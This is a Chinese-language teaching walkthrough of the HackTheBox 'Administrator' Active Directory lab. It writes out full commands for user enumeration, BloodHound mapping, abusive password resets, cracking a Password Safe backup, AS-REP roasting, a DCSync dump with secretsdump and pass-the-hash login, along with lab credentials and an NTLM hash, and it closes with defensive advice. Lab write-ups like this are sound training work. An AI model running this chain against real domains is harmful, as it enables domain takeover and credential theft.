HTB-Administrator 域渗透靶机教学文档

初始信息

• 目标IP: 10.10.11.42
• 初始凭据:
  • 用户名: Olivia
  • 密码: ichliebedich
• 域名: administrator.htb

信息收集阶段

端口扫描

1. 初始快速扫描:

   nmap -sT --min-rate 10000 -p- 10.10.11.42 -oA ./port
   

2. 详细扫描所有端口(包括动态端口49303以下)

服务枚举

FTP服务

• 尝试匿名登录和初始凭据均失败
• 后续发现Benjamin用户可访问FTP服务

SMB服务

• 使用初始凭据枚举:

  crackmapexec smb 10.10.11.42 -u olivia -p 'ichliebedich' --rid-brute | grep 'SidTypeUser'
  

• 发现可访问的共享文件夹，但无直接可利用文件

有效用户枚举

1. 使用kerbrute:

   ./kerbrute_linux_amd64 userenum --dc 10.10.11.42 -d administrator.htb /usr/share/wordlists/amass/subdomains-top1mil-110000.txt
   

2. 结合crackmapexec结果，获得完整用户列表:

   Administrator
   Guest
   krbtgt
   DC$
   olivia
   michael
   benjamin
   emily
   ethan
   alexander
   emma
   

BloodHound利用

安装与配置

1. 安装:

   sudo apt install bloodhound bloodhound.py
   

2. 启动Neo4j数据库(默认凭据neo4j/neo4j)

数据收集

使用bloodhound-python收集数据:

bloodhound-python -c All -u Olivia -p ichliebedich -ns 10.10.11.42 -d administrator.htb -dc administrator.htb --zip

权限分析

1. Olivia → Michael: GenericAll权限(可修改密码)
2. Michael → Benjamin: ForceChangePassword权限
3. Emily → Ethan: GenericWrite权限
4. Ethan → Domain: DCSync权限

横向移动路径

第一步: Olivia → Michael

1. 使用evil-winrm登录Olivia账户:

   evil-winrm -i 10.10.11.42 -u Olivia -p 'ichliebedich'
   

2. 修改Michael密码:

   net user Michael 12345678 /DOMAIN
   

第二步: Michael → Benjamin

尝试多种方法修改Benjamin密码:

1. 使用rpcclient:

   rpcclient -U Michael //10.10.11.42
   setuserinfo2 Benjamin 23 '12345678'
   

2. 使用bloodyAD:

   bloodyAD -u "Michael" -p "12345678" -d "administrator.htb" --host "10.10.11.42" set password "Benjamin" "12345678"
   

FTP服务突破

使用Benjamin凭据访问FTP，发现加密备份文件Backup.psafe3

1. 使用pwsafe2john破解:

   pwsafe2john Backup.psafe3 > pwsafe.hash
   john --wordlist=/usr/share/wordlists/rockyou.txt pwsafe.hash
   

   • 破解密码: tekieromucho

2. 使用PasswordSafe或KeePassXC打开备份文件，获得三组新凭据:

   alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Swe
   emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmbe
   emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
   

第三步: 立足点建立

使用emily凭据登录，在Desktop下发现user.txt

权限提升路径

第四步: Emily → Ethan

1. 使用evil-winrm登录emily账户

2. 禁用Ethan账户的Kerberos预身份验证:

   Get-ADUser ethan | Set-ADAccountControl -doesnotrequirepreauth $true
   

3. 获取Ethan的TGT:

   impacket-GetNPUsers administrator.htb/ethan -dc-ip 10.10.11.42
   

4. 破解hash:

   hashcat -m 18200 ethan.hash /usr/share/wordlists/rockyou.txt --force
   

   • 获得密码: limpbizkit

第五步: Ethan → Domain Admin

1. 检查BloodHound发现Ethan有DCSync权限

2. 执行DCSync攻击获取管理员hash:

   impacket-secretsdump administrator.htb/ethan:limpbizkit@10.10.11.42 -dc-ip 10.10.11.42 -just-dc-user administrator
   

   • 获得Administrator的NTLM hash: 3dc553ce4b9fd20bd016e098d2d2fd2e

3. 使用Pass-the-Hash登录:

   evil-winrm -i 10.10.11.42 -u administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
   

关键技术与概念

1. Kerbrute: 用于枚举域内有效用户
2. BloodHound: 可视化分析Active Directory权限关系
3. GenericAll权限滥用: 允许重置用户密码
4. ForceChangePassword权限: 强制修改用户密码
5. GenericWrite权限滥用: 可修改用户属性(如禁用预身份验证)
6. DCSync攻击: 模拟域控制器同步获取密码hash
7. Pass-the-Hash: 使用NTLM hash直接认证

防御建议

1. 限制GenericAll、GenericWrite等过高权限分配
2. 监控DCSync操作，限制非域控制器的DCSync权限
3. 启用Kerberos预身份验证
4. 实施密码策略防止简单密码
5. 监控异常密码重置操作
6. 定期审计Active Directory权限分配